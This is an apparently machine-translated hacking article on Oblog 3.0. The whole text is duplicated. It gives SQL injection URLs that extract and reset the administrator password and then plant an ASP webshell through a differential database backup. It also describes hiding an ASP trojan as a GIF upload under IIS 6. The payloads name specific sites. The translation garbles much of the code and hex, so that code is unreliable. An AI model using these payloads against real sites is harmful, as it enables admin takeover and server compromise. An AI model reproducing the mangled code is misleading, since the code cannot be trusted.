O-blogホール暴光
ps:気がふさぐ納、1つの整形変数、どうして強制的に転換しませんか?
第六回黒防実験室を見たことがあります。二人の侠客はOblog 3.0に対しています。 Accessバージョンの浸透過程は、敬服の気持ちがまるで滔々としている川の水のように延々と続いて、また黄河の水のようにますます収拾がつかなくなりました。特に彼らは社会工学の原理を利用して、巧みなバックグラウンドにshellをアップロードする方法があります。感心する。こんなに多くの無駄話をして、本題に入りました。Oblog 3.0コードを通読しているうちに、user_を発見しました。blogmage.aspファイルにセキュリティ上の潜在的なリスクがあります。次のモバイルブログログの操作コードを見てください。
sub moveblog
if id=" then
Oblog.adderstr(「移動するログを指定してください」)
Oblog.showuserr
exit sub
end if
dim subjectiid
subjectid=trim(request(「subject」)
if subjectiid=" then
Oblog.adderstr(「移動する目標テーマを指定してください」)
Oblog.showuserr
exit sub
else
subjectiid=Clin(subjectiid)
end if
if instr(id,",")>0 then
「id変数にコンマが含まれている場合は、変数の空欄を外して、次のsql文を実行します。第一条にする
id=replace(id)「 ","")
sql=「Update」 [Oblog_ロゴ セット subjectiid=「&subject id&」 where ロゴ in (" & id。 & ")"&ニュース
このsql文を実行しないと、第二条にします。
else
sql=「Update」 [Oblog_ロゴ セット subjectiid=「&subject id&」 where ロゴ=" & id。 &ニュース
end if
Oblog.Execute sql
dim ブログ、パー1
セット ブログ=new クラスブログ
blog.userid=Oblog.logined_uid
blog.udate_allsbjectiid()
blog.udate_index_subject 0,0,0,“”
セット ブログ=nothing
セット rs=Oblog.execute subjectiid from Oblog_subject where userid="&Oblog.logined_uid)
while not s.eof
セット RS 1=Oblog.execute(「select」) count(ロゴ) from Oblog_ロゴ where Oblog_log.subjectiid=「&rs(0)」
Oblog.execute(「udate」) Oblog_subject セット subjectlognum=“&rs 1()&” where Oblog_subject.subjectiid=「&rs(0)」
rs.movent ext
wend
セット rs=nothing
セット rs 1=nothing
Oblog.shorwok "テーマの更新に成功しました。新たにトップページを発表しないと、テーマの統計が正確になりません。
end sub
また、ファイルの一番上のID変数に対するフィルタリングを見てください。id=Oblog.filt_badstr(trim(Request(id)))は、この文だけを使用しています。関数コードは以下の通りです。
public 機能 filtbadstr.
If。 Isnull(Str) The n
filtbadstr = ""
Exit Function
End If。
Str = Replace(Str,Chr(0),“”)
filtbadstr = Replace(Str,','''')
end 機能
ただ\0と単引用符を外しました。ほほほ、どうして私達の注入攻撃を阻止できますか?Oblog 3.0を使うべきです。 SQLバージョンのサイト牛刀小試し:環境テスト文を構成する:http://www.boyqs.bloger.com.cn/user_blogmage.asp?action=Move&subject=1&id=@version)--語句の一番後ろの「」に注意しないと成功しません。
以上のように私達が選んだのは最初の文です。制限条件が多くて、スペースを使ってはいけないということです。そして、提出した文にはコンマが含まれています。スペースの代わりに/**/を使うことができます。制限条件が多いので、以下のテストではプログラムを制御して第二の文を実行します。さらに環境を探る:
http://www.boyqs.bloger.com.cn/user_blogmage.asp?action=Move&subject=1&id=1%20 and%20 db_name()>0--
http://www.boyqs.bloger.com.cn/user_blogmage.asp?action=Move&subject=1&id=1%20 and%20 db_user>0--
へへへ、テストに成功しました。文章にはシングル引用符が含まれていないので、百戦錬磨の私達はもちろんこの制限を許しやすいです。SQLの中のchar関数を使うのが好きです。ちょうど手元に動き易システムを研究する時に書くcharコードツールがあります。Oblogデータベースの構造を見てみてください。Oblog_admin表の中で興味があるのはid、usernameとpasswordフィールドだけです。先にadminユーザーまたはid唯一の管理者アカウントのパスワードを暴いてみます。
http://www.target.com/user_blogmage.asp?action=Move&subject=1&id=1 and 1=(select password from Oblog_admin where id=1)--または
http://www.target.com/user_blogmage.asp?action=Move&subject=1&id=1 and 1=(select password from Oblog_admin where username=char(0 x 61)%2 Bchar(0 x 64)%2 Bchar(0 x 6 d)%2 Bchar(0 x 69)%2 Bchar(0 x 6 e))--
ここで、char(0 x 61)%2 Bchar(0 x 64)%2 Bchar(0 x 6 d)%2 Bchar(0 x 69)%2 Bchar(0 x 6 e)は、提出されたadminに対してchar関数を使用する符号化である。結果を返します。
私たちはまずこの暗号化された文字列を覚えて、管理者のパスワードを回復する時にまた使う必要があります。バックグラウンド管理者のパスワードを変更:
http://www.target.com/user_blogmage.asp?action=Move&subject=1&id=1;udate [Oblog_admin) セット password= 2 Bchar(0 x 34)%2 Bchar(0 x 36)%2 Bchar(0 x 39)%2 Bchar(0 x 65)%2 Bchar(0 x 38)%2 Bchar(0 x 38)%2 Bchar(0 x 30)%2 Bchar(0 x 64)%2 Bchar(0 x 33)%2 Bchar(0 x 32)%2 Bchar(0 x 32)%2 Bchar(0 x 32)%2 Bchar(0 x 32)%2 Bchar(0 x 32)%2 Bchar(0 x 32)%2 Bchar(0 x 32)%2 Bchar(0 x 35)%Bchar(0 x 35)%Bchar(0 x 35)%Bchar(0 x 35)%Bchar char(0 x 38) where id=1--
その中のchar(0 x 34)%2 Bchar(0 x 36)%2 Bchar(0 x 39)%2 Bchar(0 x 65)% 2 Bchar(0 x 38)%2 Bchar(0 x 30)%2 Bchar(0 x 64)%2 Bchar(0 x 33)%2 Bchar(0 x 32)%2 Bchar(0 x 63) %2 Bchar(0 x 30)%2 Bchar(0 x 35)%2 Bchar(0 x 35)%2 Bchar(0 x 39)%2 Bchar(0 x 66)%2 Bchar(0 x 38) は、469 e 80 d 32 c 0595 f 8文字列の符号化であり、469 e 80 d 32 c 0596 f 8に対応するmd 5は、admin 888であり、文字列の符号化には以下のツールが使用されてもよい。
もちろん皆さんもきっともっといいものがあります。このようにバックグラウンドIDを1の管理人のパスワードに変更しました。IDが1の管理人が対応するアカウントはデフォルトでadminです。もしあなたが確定していないなら、次のような文言で調べられます。
http://www.target.com/user_blogmage.asp?action=Move&subject=1&id=1 and 1=(select username from Oblog_admin where id=1)―
変更が完了しました。管理者パスワードの変更が成功したかどうか確認してください。good、私たちはもう楽屋管理権限を持っています。さわやかです。喜ぶのは早すぎます。バックグラウンドに入りましたが、SQLバージョンはAccessバージョンと違って、前の2人の侠客が紹介したバックアップデータベースでWebShellを取得する方法はSQLバージョンでは通用しません。見てください。 admin_database.aspのコードは以下の通りです。
dim dbpath
dim ObjInstalled
if not Is Object(conn) then link_database
if is_sqldaa=0 then dbpath=server.mappath(db)
Accessバージョンを使用するとdbpathパラメータを初期化します。
ここではSQLバージョンでWebShellを取得する方法をいくつか紹介します。
まず第一に共通の方法を説明しましょう。SQLを利用します。 SERVERの特性は、方法がxp_を通過します。cmdshellは、OLIEオブジェクトインターフェースを利用して、sp_を利用します。make Webtaskは、インクリメンタルバックアップなどの方法によります。これらの方法を利用する必要な条件:Web物理パスは、バックグラウンドの管理トップページから簡単に取得できます。具体的な注入文については、uplloadshell.exeの関連コードを参照してください。実現中は、その中のシングルクォーテーションマークを注意深く処理してください。プログラムは、IE中のクッキー情報を自動的に取得することができる。クッキー情報を記入する必要はありません。
バックグラウンドの機能を利用してshellをアップロードしましたが、確かに私を長い間苦労させました。頭が大きくなりました。最初の方法はエンジェル人形です。彼らの考えは同じです。shtmを追加してファイルタイプをアップロードして、conn.aspを含めると、データベースの接続情報しか見えません。その後、aaspsp/とasp/アップロードファイルのタイプを追加したいです。このようにデータパッケージを修正してアップロードしましたが、本当にアップロードできませんでした。とても憂鬱です。休みの間、原因を調べる時間もあまりないです。この時、突然バックグラウンドでユーザーディレクトリを設定できるのを見ました。この時、突然に覚えています。インターネットでは、Windows 2003とIS 6.0を想定したWebプラットフォームの特性が伝えられています。**asp仮想ディレクトリの下にある拡張子のファイルは、aspファイルとして解釈されて実行されます。ここを思い出して興奮して踊りそうになりました。操作を見てください。バックグラウンドの常規設定|ユーザーディレクトリ管理に***.aspのディレクトリを新規作成します。このディレクトリは上の図のようにデフォルトのディレクトリに設定されます。それからウェブサイトに新しいユーザーを登録して、管理センターに入って、アルバムを選んで、asp木馬の偽gifファイルをアップロードします。このgifファイルにアクセスすると、IISはこのファイルをaspファイルとして解析します。本機でAccessバージョンを使ってテストしましたが、ファイルをアップロードすることができます。しかし、SQLバージョンのテスト時にこのディレクトリにファイルを正しくアップロードできないことが分かりました。次のようなエラー情報があります。
ADODB.Stream エラー '800 a 0 bbc
ファイルの書き込みに失敗しました。
//inc/Upload.inc、行 312
成功はできませんが、これは私たちのバックグラウンドでトロイの木馬をアップロードするいい方法です。ほとんどのaspサイトのプログラムはバックグラウンドでアップロードディレクトリを変更することができます。例えば、移動システムなどです。仕方がないです。最初の方法を使うしかないです。
ステップ1:
http://www.ucblog.com/user_blogmage.asp?action=Move&subject=1&id=1;declare @a. sysnamedeclare @s nvarrhar(4000)プロジェクト @a=db_name()プロジェクト @s=0 x 77006 F 006 B 006106 F 002 E 006206 B 00;backup database @a. ト disk=@s--
注意してください。語句には必ず単引用符が含まれてはいけません。
ステップ2:
http://www.ucblog.com/user_blogmage.asp?action=Move&subject=1&id=1;create テーブル [dbo.[llikz] ([cmd] [イメージ
ステップ3:
http://www.ucblog.com/user_blogmage.asp?action=Move&subject=1&id=1;インセンス イント llikz(cmd) values(0 x 3 C 255786565746265757575757373742822629253 E)――
注意すべき点のうち、0 x 3 C 2557865637574626575757573742822629253 Eは
ステップ4:
http://www.ucblog.com/user_blogmage.asp?action=Move&subject=1&id=1;declare @a. sysnamedeclare @s nvarrhar(4000) プロジェクト @a=db_name()プロジェクト @s=0 x 66003 a 006206 c 006 f 00670000003505 c 006206 c 006 f 0067007306307200650 006 c 006 c 006 c 0069006 b 007 a 002 e 00610073000;backup database @a. ト disk=@s WITH DIFFERENTIAL――
その中の 0 x 66003 a 005 c 006206 c 006 f 0067000030033505 c 006206 c 006 f 0067007306307200650 006 c 006 c 0069006 b 007 a 00610073000 バックグラウンドで得られたWebの物理パスです。
増分バックアップを使うには、publicの権限だけが必要です。OBLOGです。 3.0 SQLバージョンはWebShellの一番いい方法を持っています。操作が複雑だと感じたら、WebShellをアップロードしなくてもいいです。バックグラウンドに入って自分のアカウントをVIPユーザーに修正したり、アップロードスペースを1000万KBに修正したりして、ブログをネットのベスト盤として使ってもいいです。Oblogがインターネット上で流行っているので、脆弱性が大きいです。皆さん、むやみに破壊しないでください。
第六回黒防実験室を見たことがあります。二人の侠客はOblog 3.0に対しています。 Accessバージョンの浸透過程は、敬服の気持ちがまるで滔々としている川の水のように延々と続いて、また黄河の水のようにますます収拾がつかなくなりました。特に彼らは社会工学の原理を利用して、巧みなバックグラウンドにshellをアップロードする方法があります。感心する。こんなに多くの無駄話をして、本題に入りました。Oblog 3.0コードを通読しているうちに、user_を発見しました。blogmage.aspファイルにセキュリティ上の潜在的なリスクがあります。次のモバイルブログログの操作コードを見てください。
sub moveblog
if id=" then
Oblog.adderstr(「移動するログを指定してください」)
Oblog.showuserr
exit sub
end if
dim subjectiid
subjectid=trim(request(「subject」)
if subjectiid=" then
Oblog.adderstr(「移動する目標テーマを指定してください」)
Oblog.showuserr
exit sub
else
subjectiid=Clin(subjectiid)
end if
if instr(id,",")>0 then
「id変数にコンマが含まれている場合は、変数の空欄を外して、次のsql文を実行します。第一条にする
id=replace(id)「 ","")
sql=「Update」 [Oblog_ロゴ セット subjectiid=「&subject id&」 where ロゴ in (" & id。 & ")"&ニュース
このsql文を実行しないと、第二条にします。
else
sql=「Update」 [Oblog_ロゴ セット subjectiid=「&subject id&」 where ロゴ=" & id。 &ニュース
end if
Oblog.Execute sql
dim ブログ、パー1
セット ブログ=new クラスブログ
blog.userid=Oblog.logined_uid
blog.udate_allsbjectiid()
blog.udate_index_subject 0,0,0,“”
セット ブログ=nothing
セット rs=Oblog.execute subjectiid from Oblog_subject where userid="&Oblog.logined_uid)
while not s.eof
セット RS 1=Oblog.execute(「select」) count(ロゴ) from Oblog_ロゴ where Oblog_log.subjectiid=「&rs(0)」
Oblog.execute(「udate」) Oblog_subject セット subjectlognum=“&rs 1()&” where Oblog_subject.subjectiid=「&rs(0)」
rs.movent ext
wend
セット rs=nothing
セット rs 1=nothing
Oblog.shorwok "テーマの更新に成功しました。新たにトップページを発表しないと、テーマの統計が正確になりません。
end sub
また、ファイルの一番上のID変数に対するフィルタリングを見てください。id=Oblog.filt_badstr(trim(Request(id)))は、この文だけを使用しています。関数コードは以下の通りです。
public 機能 filtbadstr.
If。 Isnull(Str) The n
filtbadstr = ""
Exit Function
End If。
Str = Replace(Str,Chr(0),“”)
filtbadstr = Replace(Str,','''')
end 機能
ただ\0と単引用符を外しました。ほほほ、どうして私達の注入攻撃を阻止できますか?Oblog 3.0を使うべきです。 SQLバージョンのサイト牛刀小試し:環境テスト文を構成する:http://www.boyqs.bloger.com.cn/user_blogmage.asp?action=Move&subject=1&id=@version)--語句の一番後ろの「」に注意しないと成功しません。
以上のように私達が選んだのは最初の文です。制限条件が多くて、スペースを使ってはいけないということです。そして、提出した文にはコンマが含まれています。スペースの代わりに/**/を使うことができます。制限条件が多いので、以下のテストではプログラムを制御して第二の文を実行します。さらに環境を探る:
http://www.boyqs.bloger.com.cn/user_blogmage.asp?action=Move&subject=1&id=1%20 and%20 db_name()>0--
http://www.boyqs.bloger.com.cn/user_blogmage.asp?action=Move&subject=1&id=1%20 and%20 db_user>0--
へへへ、テストに成功しました。文章にはシングル引用符が含まれていないので、百戦錬磨の私達はもちろんこの制限を許しやすいです。SQLの中のchar関数を使うのが好きです。ちょうど手元に動き易システムを研究する時に書くcharコードツールがあります。Oblogデータベースの構造を見てみてください。Oblog_admin表の中で興味があるのはid、usernameとpasswordフィールドだけです。先にadminユーザーまたはid唯一の管理者アカウントのパスワードを暴いてみます。
http://www.target.com/user_blogmage.asp?action=Move&subject=1&id=1 and 1=(select password from Oblog_admin where id=1)--または
http://www.target.com/user_blogmage.asp?action=Move&subject=1&id=1 and 1=(select password from Oblog_admin where username=char(0 x 61)%2 Bchar(0 x 64)%2 Bchar(0 x 6 d)%2 Bchar(0 x 69)%2 Bchar(0 x 6 e))--
ここで、char(0 x 61)%2 Bchar(0 x 64)%2 Bchar(0 x 6 d)%2 Bchar(0 x 69)%2 Bchar(0 x 6 e)は、提出されたadminに対してchar関数を使用する符号化である。結果を返します。
私たちはまずこの暗号化された文字列を覚えて、管理者のパスワードを回復する時にまた使う必要があります。バックグラウンド管理者のパスワードを変更:
http://www.target.com/user_blogmage.asp?action=Move&subject=1&id=1;udate [Oblog_admin) セット password= 2 Bchar(0 x 34)%2 Bchar(0 x 36)%2 Bchar(0 x 39)%2 Bchar(0 x 65)%2 Bchar(0 x 38)%2 Bchar(0 x 38)%2 Bchar(0 x 30)%2 Bchar(0 x 64)%2 Bchar(0 x 33)%2 Bchar(0 x 32)%2 Bchar(0 x 32)%2 Bchar(0 x 32)%2 Bchar(0 x 32)%2 Bchar(0 x 32)%2 Bchar(0 x 32)%2 Bchar(0 x 32)%2 Bchar(0 x 35)%Bchar(0 x 35)%Bchar(0 x 35)%Bchar(0 x 35)%Bchar char(0 x 38) where id=1--
その中のchar(0 x 34)%2 Bchar(0 x 36)%2 Bchar(0 x 39)%2 Bchar(0 x 65)% 2 Bchar(0 x 38)%2 Bchar(0 x 30)%2 Bchar(0 x 64)%2 Bchar(0 x 33)%2 Bchar(0 x 32)%2 Bchar(0 x 63) %2 Bchar(0 x 30)%2 Bchar(0 x 35)%2 Bchar(0 x 35)%2 Bchar(0 x 39)%2 Bchar(0 x 66)%2 Bchar(0 x 38) は、469 e 80 d 32 c 0595 f 8文字列の符号化であり、469 e 80 d 32 c 0596 f 8に対応するmd 5は、admin 888であり、文字列の符号化には以下のツールが使用されてもよい。
もちろん皆さんもきっともっといいものがあります。このようにバックグラウンドIDを1の管理人のパスワードに変更しました。IDが1の管理人が対応するアカウントはデフォルトでadminです。もしあなたが確定していないなら、次のような文言で調べられます。
http://www.target.com/user_blogmage.asp?action=Move&subject=1&id=1 and 1=(select username from Oblog_admin where id=1)―
変更が完了しました。管理者パスワードの変更が成功したかどうか確認してください。good、私たちはもう楽屋管理権限を持っています。さわやかです。喜ぶのは早すぎます。バックグラウンドに入りましたが、SQLバージョンはAccessバージョンと違って、前の2人の侠客が紹介したバックアップデータベースでWebShellを取得する方法はSQLバージョンでは通用しません。見てください。 admin_database.aspのコードは以下の通りです。
dim dbpath
dim ObjInstalled
if not Is Object(conn) then link_database
if is_sqldaa=0 then dbpath=server.mappath(db)
Accessバージョンを使用するとdbpathパラメータを初期化します。
ここではSQLバージョンでWebShellを取得する方法をいくつか紹介します。
まず第一に共通の方法を説明しましょう。SQLを利用します。 SERVERの特性は、方法がxp_を通過します。cmdshellは、OLIEオブジェクトインターフェースを利用して、sp_を利用します。make Webtaskは、インクリメンタルバックアップなどの方法によります。これらの方法を利用する必要な条件:Web物理パスは、バックグラウンドの管理トップページから簡単に取得できます。具体的な注入文については、uplloadshell.exeの関連コードを参照してください。実現中は、その中のシングルクォーテーションマークを注意深く処理してください。プログラムは、IE中のクッキー情報を自動的に取得することができる。クッキー情報を記入する必要はありません。
バックグラウンドの機能を利用してshellをアップロードしましたが、確かに私を長い間苦労させました。頭が大きくなりました。最初の方法はエンジェル人形です。彼らの考えは同じです。shtmを追加してファイルタイプをアップロードして、conn.aspを含めると、データベースの接続情報しか見えません。その後、aaspsp/とasp/アップロードファイルのタイプを追加したいです。このようにデータパッケージを修正してアップロードしましたが、本当にアップロードできませんでした。とても憂鬱です。休みの間、原因を調べる時間もあまりないです。この時、突然バックグラウンドでユーザーディレクトリを設定できるのを見ました。この時、突然に覚えています。インターネットでは、Windows 2003とIS 6.0を想定したWebプラットフォームの特性が伝えられています。**asp仮想ディレクトリの下にある拡張子のファイルは、aspファイルとして解釈されて実行されます。ここを思い出して興奮して踊りそうになりました。操作を見てください。バックグラウンドの常規設定|ユーザーディレクトリ管理に***.aspのディレクトリを新規作成します。このディレクトリは上の図のようにデフォルトのディレクトリに設定されます。それからウェブサイトに新しいユーザーを登録して、管理センターに入って、アルバムを選んで、asp木馬の偽gifファイルをアップロードします。このgifファイルにアクセスすると、IISはこのファイルをaspファイルとして解析します。本機でAccessバージョンを使ってテストしましたが、ファイルをアップロードすることができます。しかし、SQLバージョンのテスト時にこのディレクトリにファイルを正しくアップロードできないことが分かりました。次のようなエラー情報があります。
ADODB.Stream エラー '800 a 0 bbc
ファイルの書き込みに失敗しました。
//inc/Upload.inc、行 312
成功はできませんが、これは私たちのバックグラウンドでトロイの木馬をアップロードするいい方法です。ほとんどのaspサイトのプログラムはバックグラウンドでアップロードディレクトリを変更することができます。例えば、移動システムなどです。仕方がないです。最初の方法を使うしかないです。
ステップ1:
http://www.ucblog.com/user_blogmage.asp?action=Move&subject=1&id=1;declare @a. sysnamedeclare @s nvarrhar(4000)プロジェクト @a=db_name()プロジェクト @s=0 x 77006 F 006 B 006106 F 002 E 006206 B 00;backup database @a. ト disk=@s--
注意してください。語句には必ず単引用符が含まれてはいけません。
ステップ2:
http://www.ucblog.com/user_blogmage.asp?action=Move&subject=1&id=1;create テーブル [dbo.[llikz] ([cmd] [イメージ
ステップ3:
http://www.ucblog.com/user_blogmage.asp?action=Move&subject=1&id=1;インセンス イント llikz(cmd) values(0 x 3 C 255786565746265757575757373742822629253 E)――
注意すべき点のうち、0 x 3 C 2557865637574626575757573742822629253 Eは
ステップ4:
http://www.ucblog.com/user_blogmage.asp?action=Move&subject=1&id=1;declare @a. sysnamedeclare @s nvarrhar(4000) プロジェクト @a=db_name()プロジェクト @s=0 x 66003 a 006206 c 006 f 00670000003505 c 006206 c 006 f 0067007306307200650 006 c 006 c 006 c 0069006 b 007 a 002 e 00610073000;backup database @a. ト disk=@s WITH DIFFERENTIAL――
その中の 0 x 66003 a 005 c 006206 c 006 f 0067000030033505 c 006206 c 006 f 0067007306307200650 006 c 006 c 0069006 b 007 a 00610073000 バックグラウンドで得られたWebの物理パスです。
増分バックアップを使うには、publicの権限だけが必要です。OBLOGです。 3.0 SQLバージョンはWebShellの一番いい方法を持っています。操作が複雑だと感じたら、WebShellをアップロードしなくてもいいです。バックグラウンドに入って自分のアカウントをVIPユーザーに修正したり、アップロードスペースを1000万KBに修正したりして、ブログをネットのベスト盤として使ってもいいです。Oblogがインターネット上で流行っているので、脆弱性が大きいです。皆さん、むやみに破壊しないでください。